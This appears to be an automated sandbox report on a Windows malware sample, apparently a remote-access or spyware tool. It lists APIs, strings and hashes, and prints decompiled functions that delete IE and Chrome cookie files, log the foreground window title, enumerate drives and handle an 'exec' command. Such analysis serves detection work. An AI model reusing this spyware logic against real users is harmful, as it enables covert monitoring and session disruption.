                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@File$??4?$basic_string@??8std@@?c_str@?$basic_string@?find@?$basic_string@CloseD@2@@0@EnvironmentExistsExpandFindFirstOpenPathQueryStringsV01@V01@@V?$basic_string@Value
                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                          • API String ID: 1627278905-4073444585
                                          • Opcode ID: 2694f6698a7aa59175af7fd993aba418089cd61275ab9121a9622683bf210f80
                                          • Instruction ID: ce9239a2887a28e7c3d3296c59a61411ed8d7c47a0aa921717fce0c83e46222a
                                          • Opcode Fuzzy Hash: 2694f6698a7aa59175af7fd993aba418089cd61275ab9121a9622683bf210f80
                                          • Instruction Fuzzy Hash: 17318471640109ABDB04EBA4DD5EAEF777CDB44314F504067E501B21D0EEB89A88CFAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • getenv.MSVCRT ref: 00405701
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040570C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405717
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405722
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040572B
                                          • DeleteFileA.KERNEL32(00000000), ref: 00405732
                                          • GetLastError.KERNEL32 ref: 0040573C
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],?,?,?,?,00000000), ref: 0040575D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 00405770
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],?,?,?,?,00000000), ref: 00405796
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004057AB
                                          Strings
                                          • [Chrome Cookies found, cleared!], xrefs: 00405791
                                          • [Chrome Cookies not found], xrefs: 00405758
                                          • UserProfile, xrefs: 004056FC
                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004056F6
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                          • API String ID: 3740952235-304995407
                                          • Opcode ID: 51d6901ca4da6e011993bb39d6d9175aba19df33fb05b91d090322444a48c6c4
                                          • Instruction ID: 8dcf24351441a3668afb3d619d1a527b51a24c68bcaca8363eb68d31d9c31fe8
                                          • Opcode Fuzzy Hash: 51d6901ca4da6e011993bb39d6d9175aba19df33fb05b91d090322444a48c6c4
                                          • Instruction Fuzzy Hash: 9C118131640509AFD700ABE4DD4EAFE7778EB50305F504077E402E31D0EEB95A88CBAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 30%
                                          			E0040F4A3(char _a4, void* _a20) {
                                          				char _v5;
                                          				void* _v24;
                                          				char _v40;
                                          				int _t26;
                                          				int _t29;
                                          				void* _t37;
                                          				unsigned int _t66;
                                          				signed int _t67;
                                          				int _t70;
                                          				signed short _t73;
                                          				struct HWND__* _t81;
                                          				void* _t83;
                                          
                                          				_t81 = GetForegroundWindow();
                                          				_t26 = GetWindowTextLengthA(_t81);
                                          				_t89 = _t26;
                                          				if(_t26 <= 0) {
                                          					L6:
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					return 0;
                                          				}
                                          				_t28 = _t26 + 1;
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z( &_v5);
                                          				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t29 = GetWindowTextA(_t81, _t26 + 1, _t26 + 1);
                                          				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                          				__imp__?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                          				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                          				E00408667(_t29, _t29, _t29, __imp__tolower);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          				E0040EFB5(_t89,  &_v40,  &_a4, 0x4108ac,  &_v5, _t28, 0);
                                          				_t73 = 0;
                                          				if(E004012B5( &_v40) <= 0) {
                                          					L5:
                                          					E00401B3C( &_v40);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					goto L6;
                                          				}
                                          				_t82 = 0;
                                          				while(1) {
                                          					_t37 = E00401289( &_v40, 0, _t82);
                                          					__imp__?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z(_t37, 0);
                                          					if(_t37 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                          						break;
                                          					}
                                          					_t73 = _t73 + 1;
                                          					_t82 = _t73 & 0x0000ffff;
                                          					if((_t73 & 0x0000ffff) < E004012B5( &_v40)) {
                                          						continue;
                                          					}
                                          					goto L5;
                                          				}
                                          				__eflags = _a20;
                                          				if(_a20 != 0) {
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					asm("repne scasb");
                                          					_t66 =  !( &_v24 | 0xffffffff);
                                          					_t83 = _t37 - _t66;
                                          					_t67 = _t66 >> 2;
                                          					_t70 = memcpy(_a20, _t83, _t67 << 2) & 0x00000003;
                                          					__eflags = _t70;
                                          					memcpy(_t83 + _t67 + _t67, _t83, _t70);
                                          				}
                                          				E00401B3C( &_v40);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return 1;
                                          			}

                                          APIs
                                          • GetForegroundWindow.USER32(74B06490,00415940,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4AB
                                          • GetWindowTextLengthA.USER32(00000000), ref: 0040F4B4
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4CD
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4D6
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4E0
                                          • GetWindowTextA.USER32 ref: 0040F4E8
                                          • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4F7
                                          • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F501
                                          • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F50B
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108AC,?,00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F522
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F531
                                            • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                            • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                            • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                            • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 0040F562
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F58D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F596
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F5AB
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F5DC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F5E5
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                                          • String ID:
                                          • API String ID: 3496238640-0
                                          • Opcode ID: d78fe6c2566b637451fcc8495cb98b3847fa1ecb3c1eee7ec14cfc758dd3ef6a
                                          • Instruction ID: 154c6d577414d328a897fa1d3e202a68548f2e644e003aaa846313a3066079b3
                                          • Opcode Fuzzy Hash: d78fe6c2566b637451fcc8495cb98b3847fa1ecb3c1eee7ec14cfc758dd3ef6a
                                          • Instruction Fuzzy Hash: E6412E31500009ABCB14EBA5DD5A9FE7BB8EB54305B504179F807B21E0EFB45E89CAA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 004039D1
                                            • Part of subcall function 0040F4A3: GetForegroundWindow.USER32(74B06490,00415940,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4AB
                                            • Part of subcall function 0040F4A3: GetWindowTextLengthA.USER32(00000000), ref: 0040F4B4
                                            • Part of subcall function 0040F4A3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4CD
                                            • Part of subcall function 0040F4A3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4D6
                                            • Part of subcall function 0040F4A3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4E0
                                            • Part of subcall function 0040F4A3: GetWindowTextA.USER32 ref: 0040F4E8
                                            • Part of subcall function 0040F4A3: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4F7
                                            • Part of subcall function 0040F4A3: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F501
                                            • Part of subcall function 0040F4A3: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F50B
                                            • Part of subcall function 0040F4A3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108AC,?,00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F522
                                            • Part of subcall function 0040F4A3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F531
                                            • Part of subcall function 0040F4A3: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 0040F562
                                            • Part of subcall function 0040F4A3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F58D
                                            • Part of subcall function 0040F4A3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F596
                                          • Sleep.KERNEL32(000003E8), ref: 004039E8
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, ]), ref: 004039FF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,00000000), ref: 00403A0F
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00403A1C
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00403A2B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A34
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A3D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A46
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403A55
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403A73
                                          • Sleep.KERNEL32(000003E8), ref: 00403A8A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@V01@@$D@1@@Window$?begin@?$basic_string@D@2@@0@Hstd@@SleepTextV?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@ForegroundLengthV01@V10@V10@@V12@
                                          • String ID: [ $ ]
                                          • API String ID: 1155922707-93608704
                                          • Opcode ID: 028624cf86794867e41c357077a072d6be74b9f20b38747f7632aa35c991c93f
                                          • Instruction ID: 47295d00c881f16adcdb252269db0bc951bee967cd76f0c472b369b741ed2101
                                          • Opcode Fuzzy Hash: 028624cf86794867e41c357077a072d6be74b9f20b38747f7632aa35c991c93f
                                          • Instruction Fuzzy Hash: 31219BB1A00109ABDB40BB75DC5AAEF7F7CAB44304F0045BAF506B31D2DE785A498B9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,7313CB00), ref: 004083F4
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004083FD
                                          • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00408415
                                          • _itoa.MSVCRT ref: 0040841C
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00408432
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040843A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 00408449
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00408456
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408462
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040846B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408474
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040847D
                                          • lstrlenA.KERNEL32(00000000), ref: 00408484
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040849A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084A3
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084AC
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@DriveTypeV01@_itoalstrlen
                                          • String ID:
                                          • API String ID: 3966177967-0
                                          • Opcode ID: 35d56568f8730d340fd7fa84469ab2b745bf81bdac80b614cf61c9766c113363
                                          • Instruction ID: f6cd9da774f90e216c8850a182eab4fb86b9b379ce6a16f8b7c54746bda286dd
                                          • Opcode Fuzzy Hash: 35d56568f8730d340fd7fa84469ab2b745bf81bdac80b614cf61c9766c113363
                                          • Instruction Fuzzy Hash: 25219A7190010EABCB14DBA0ED4D9DE7BB8EF54305B104475E506A2190EF74AF49CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E0040F9EF(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				struct tagPOINT _v12;
                                          				void* _t16;
                                          				struct HMENU__* _t17;
                                          				void* _t20;
                                          				void* _t24;
                                          
                                          				_t16 = _a8 - 1;
                                          				if(_t16 == 0) {
                                          					_t17 = CreatePopupMenu();
                                          					 *0x415ba0 = _t17;
                                          					AppendMenuA(_t17, 0, 0, "Close");
                                          					L15:
                                          					return 0;
                                          				}
                                          				_t20 = _t16 - 0x110;
                                          				if(_t20 == 0) {
                                          					if(_a12 != 0) {
                                          						goto L15;
                                          					}
                                          					Shell_NotifyIconA(2, 0x415bb0);
                                          					ExitProcess(0);
                                          				}
                                          				if(_t20 == 0x2f0) {
                                          					_t24 = _a16 - 0x201;
                                          					if(_t24 == 0) {
                                          						if(IsWindowVisible( *0x415bac) == 0) {
                                          							ShowWindow( *0x415bac, 9);
                                          							SetForegroundWindow( *0x415bac);
                                          						} else {
                                          							ShowWindow( *0x415bac, 0);
                                          						}
                                          						goto L15;
                                          					}
                                          					if(_t24 == 3) {
                                          						GetCursorPos( &_v12);
                                          						SetForegroundWindow(_a4);
                                          						TrackPopupMenu( *0x415ba0, 0, _v12, _v12.y, 0, _a4, 0);
                                          						goto L15;
                                          					}
                                          					_push(_a16);
                                          					_push(_a12);
                                          					_push(0x401);
                                          					L4:
                                          					return DefWindowProcA(_a4, ??, ??, ??);
                                          				}
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				goto L4;
                                          			}


                                          APIs
                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0040FA1C
                                          • GetCursorPos.USER32(?), ref: 0040FA47
                                          • SetForegroundWindow.USER32(?), ref: 0040FA50
                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0040FA6B
                                          • Shell_NotifyIconA.SHELL32(00000002,00415BB0), ref: 0040FABC
                                          • ExitProcess.KERNEL32 ref: 0040FAC4
                                          • CreatePopupMenu.USER32 ref: 0040FACC
                                          • AppendMenuA.USER32 ref: 0040FAE1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                          • String ID: Close
                                          • API String ID: 1657328048-3535843008
                                          • Opcode ID: d6ed23cd633fae06e75435f563c32a18db35a532ce573e8f95f6d74bc3567ba5
                                          • Instruction ID: 8e1ada1201d2f43d84cd2c70e63543890078da6759be781d4fcfc1fc91c4ebbf
                                          • Opcode Fuzzy Hash: d6ed23cd633fae06e75435f563c32a18db35a532ce573e8f95f6d74bc3567ba5
                                          • Instruction Fuzzy Hash: BC21DA31244209EFDF259FA4ED49BDA3B75AB44701F508031F609A45F0C7B59964EF1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D3B6
                                          • SetEvent.KERNEL32(?), ref: 0040D3BF
                                          • CloseHandle.KERNEL32(?), ref: 0040D3C8
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 0040D3D8
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D3E7
                                            • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                            • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                            • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                            • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D407
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,exec), ref: 0040D416
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D432
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D448
